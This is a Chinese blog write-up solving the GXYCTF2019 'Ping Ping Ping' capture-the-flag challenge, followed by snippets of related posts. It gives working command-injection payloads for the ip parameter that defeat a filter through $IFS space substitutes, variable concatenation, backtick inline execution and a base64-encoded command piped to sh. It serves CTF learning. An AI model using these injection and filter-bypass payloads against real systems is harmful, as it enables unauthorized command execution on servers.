[GXYCTF2019]Ping Ping Ping(linux命令下绕过)

最新推荐文章于 2024-05-04 13:46:15 发布
最新推荐文章于 2024-05-04 13:46:15 发布
阅读量535 收藏 3
点赞数
分类专栏: wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44111753/article/details/112128555
版权

知识点
1、绕过空格

${IFS}
$IFS$9
$IFS
<
<>
,
%20
%09

2、变量拼接
有时候可能后台过滤了某个字符串,我们可以将这个字符串中的字符出现顺序颠倒,并用变量名来代替
例如过滤了union
选择a=ion;un$a代替
3、linux下反引号内联执行,linux下反引号``里面包含的就是需要执行的系统命令
4、当过滤了bash命令时,可能可以换用sh命令,sh的大部分脚本都可以在bash下运行
更多绕过方法参考
waf绕过方法
命令执行绕过小技巧
题解:
?ip=1%20|%20ls
提示不能使用空格
?ip=1|ls
发现了flag.phpindex.php
cat${IFS}flag.php
在这里插入图片描述
好像有什么符号又被过滤了,换一种空格绕过?ip=1|cat$IFS$9flag.php
在这里插入图片描述

flag被过滤了
那就看看index.php吧
在这里插入图片描述
发现flag四个字符按照顺序排列被绕过了
?ip=1;a=g;cat$IFS$1fla$a.php
在这里插入图片描述

另外的方法
内联执行

?ip=1|cat$IFS$1`ls`

sh命令

?ip=1|echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
#Y2F0IGZsYWcucGhw为cat flag.php的base64编码
行于其野
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux常见绕过方法
wojiushilsy的博客
05-14 2452
空格过滤一些命令分隔符花括号的别样用法黑名单绕过 空格过滤 < 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等 一些命令分隔符 linux中:%0a 、%0d 、; 、& 、| 、&&、|| windows中:%0a、&、|、%1a(一个神奇的角色,作为.bat文件中的命令分隔符) 花括号的别样用法 在Linux bash中还可以使用{OS_COMMAND,ARGUMENT}来执行系统命令 {cat,flag.
GXYCTF2019 Ping Ping Ping 1
qq_52715164的博客
04-17 1415
解题步骤: 1,尝试用输入一个正确的IP地址 2,发现是linux系统下的网站,尝试用|和ls查看目录,列出文件 3,尝试查看flag文件,发现不能直接打开,且空格被过滤,原因:关键字被过滤 4,找到被过滤字符名单,尝试打开index.php文件,发现过滤字符列表 5,尝试绕过 代码中有个 $a 考虑进行变量覆盖,构造如下 payload ?ip=1;a=f;d=ag;c=l;cat$IFS$a$c$d.php ?ip=127.0.0.1;a=g,cat$IFS$1fla$a.php 或者另外一种方
LINUX系统ping命令完整实现(带路由追踪参数)
07-10
LINUX操作系统下的PING命令完整实现,带有路由追踪的功能和CTRL+C终止的功能。
ctf中ping命令执行绕过
m0_75178803的博客
10-10 1032
相关wp参考在用linux命令时候,我们可以一行执行多条命令或者有条件的执行下一条命令方式:command1;command2用;号隔开每个命令, 每个命令按照从左到右的顺序,顺序执行, 彼此之间不关心是否失败,所有命令都会执行。方式:command1 | commandLinux所提供的管道符“|”将两个命令隔开,管道符左边命令的输出就会作为管道符右边命令的输入。连续使用管道意味着第一个命令的输出会作为第二个命令的输入,第二个命令的输出又会作为第三个命令的输入,依此类推。总之就是,
命令执行绕过 [GXYCTF2019]Ping Ping Ping1
m0_75178803的博客
10-10 855
在去年参加的第四届强网杯全国网络安全竞赛中,就遇到过命令执行漏洞绕过的题目 CTF解题-2020年强网杯参赛WriteUp(题目名称 “主动” ),当时采用了 base64 编码联合反引号、变量拼接两种方式绕过了 flag 关键字的过滤并读取了 flag 值:本文目的在于结合 BU_绕过空格过滤。所以cat$IFS$1`ls`也相当于cat falg.php;`` 反引号 cat$IFS$1`ls`cat $a$b.php。通过变量赋值,再进行拼接,即可进行绕过
CTFping命令绕过及符号用法
Hardworking666的博客
10-13 1万+
文章目录一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings warnings.filterwarnings('ig..
[GXYCTF2019]Ping Ping Ping(远程命令执行)
weixin_45253573的博客
11-14 650
打开环境 先ping一下本地 http://0ce37cff-0de4-420e-9a38-09b7bc30030f.node3.buuoj.cn//?ip=127.0.0.1 利用分号执行命令 http://0ce37cff-0de4-420e-9a38-09b7bc30030f.node3.buuoj.cn//?ip=127.0.0.1;ls 直接cat http://0ce37cff-0de4-420e-9a38-09b7bc30030f.node3.buuoj.cn//?ip=127.0.0
BUU CTF [GXYCTF2019]Ping Ping Ping 1
qiaopeifan的博客
01-26 471
BUU CTF [GXYCTF2019]Ping Ping Ping 1打开题目,页面显示/?ip= 应该是一个传参的提示。 结合题目的ping。尝试?ip=1 1.看到ip很明显传一个Ip看看 作为菜鸟,我根据自己的判断认为通过Ip传输方式认为是linux所以我们可以在这里输入linux命令常用的就是ls 2.我们看到两个文件,完了进行访问,但是发现flag.php访问不了,大概是说有空格, 判断目标网站是对空格进行了过滤,我们可以使用一些方法代替空格来起到分割作用 注:%20(space)、%09(t
buuctf [GXYCTF2019]Ping Ping Ping学习笔记
haoxue__的博客
05-11 504
学习笔记
[buuoj][GXYCTF2019]Ping Ping Ping
qq_42250840的博客
07-07 386
知识点: linux命令执行 当应用需要调用一些外部程序去处理内容的情况下,就会用到一些 执行系统命令的函数。如果用户可以控制命令执行函数中的参数时, 就可以注入一些恶意的系统命令到正常命令,造成命令执行漏洞 绕过空格、敏感字符、连接符 复现: 尝试?ip=127.0.0.1;ls 找到flag.php、index.php 尝试访问: ?ip=127.0.0.1 ;cat flag.php 空格被过滤, 1.%20(space)、%09(tab)、$IFS$9、 IFS、{IFS} 2.使用&l
BUUCTF中**web**总结合集(正在更新中)
最新发布
m0_64169451的博客
05-04 1167
buuctf中web练习题做题总结
CTF命令执行绕过技巧
热门推荐
JBlock的博客
03-07 2万+
前言 今天是代码审计部分的一个技巧补充!前些阵子做了sql注入回顾篇系列!今天开启php代码审计系列! 今天内容主要是CTF中命令注入及绕过的一些技巧!以及构成RCE的一些情景! 文章目录前言正文代码执行代码执行的几种方式命令执行常见命令执行函数绕过姿势敏感字符绕过处理无回显的命令执行Think one Think 正文 在详细介绍命令注入之前,有一点需要注意:命令注入与远程代码执行不同。他们的区...
CTF中ping文件执行漏洞无回显反弹拿flag
拉风的鲨鱼的博客
03-31 9588
打开网页内容如下 我们来看一下核心代码 <?php include_once "code.txt"; if (isset($_POST['ip'])) { $p=$_POST['ip']; if(preg_match("/(;|`|&| |\\$|python|ruby|perl...
ctf-ping命令执行绕过
bamanju0574的博客
09-10 4923
题目连接:http://ctf.klmyssn.com/challenges#Ping 命令执行绕过,试了试过滤了一些:一些命令 但是反引号可以执行命令 通过拼接,可以拼接出来:ls 命令 127.0.0.1;`a="l";b="s";c=$a$b;$c` 可以发现 flag就是下面那一串flag_ 开头的字符串 在拼接命令来...
ping命令执行过程详解
wu407797466的专栏
08-27 9231
ping命令执行过程详解      “ping”是我们经常会接触到的命令,但是大家对这个命令的了解有多少,这个命令执行过程以及返回过来的信息代表什么意思呢?接下来我为大家逐一讲解。 先看一下“Ping”的执行过程 就以这样一个网络作为例子:假设有A、B、C、D四台机器,一台路由RA,子网掩码均为255.255.255.0,默认网关是192.168.0.1   1.同一网段   我们
命令执行漏洞和修复方案
pygain的博客
10-22 1万+
当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system,exec,shell_exec等,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。 漏洞成因: 脚本语言优点是简洁,方便,但也伴随着一些问题,如速度慢,无法解除系统底层,如果我们开发的应用需要一些除去web的特殊功能时,就需要调用一些外部程序。 PHP可调用外部程序的常见函数:system,exec,shell_exec,passthru,popen,pro
WEB知识学习
qq_41672971的博客
10-11 342
123
Ping命令、常用管道符、Linux windows的常用命令、 Buuctf[ACTF_2020-Exec]、 [GXY_CTF-Ping Ping Ping]
veinard_F的博客
06-06 1101
ping命令
CTF关于ping命令注入问题(1)
欢迎来到神林的博客
03-07 1万+
题目样式 对于看到ping或者ping命令却没有弄waf时就要想到命令注入。 具体注入方法 看到ping命令就可以利用截断来执行新的命令。 首先测试所有的截断符号: ‘$’ ‘;’ ‘|’ ‘-’ ‘(’ ‘)’ ‘反引号’ ‘||’ ‘&amp;&amp;’ ‘&amp;’ ‘}’ ‘{’ '%0a’可以当作空格来用; 利用截断符号配合普通命令简单问题基本就出来; 例如:ip=127.0.0.1...
[GXYCTF2019]Ping Ping Ping
09-14
[GXYCTF2019]Ping Ping Ping是一道关于命令注入的题目。在提供的引用中,我们可以看到一个简单的PHP代码段,通过传递ip参数进行ping命令执行。同时,引用中还给出了一些限制条件,如禁止使用特殊符号、空格、bash...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值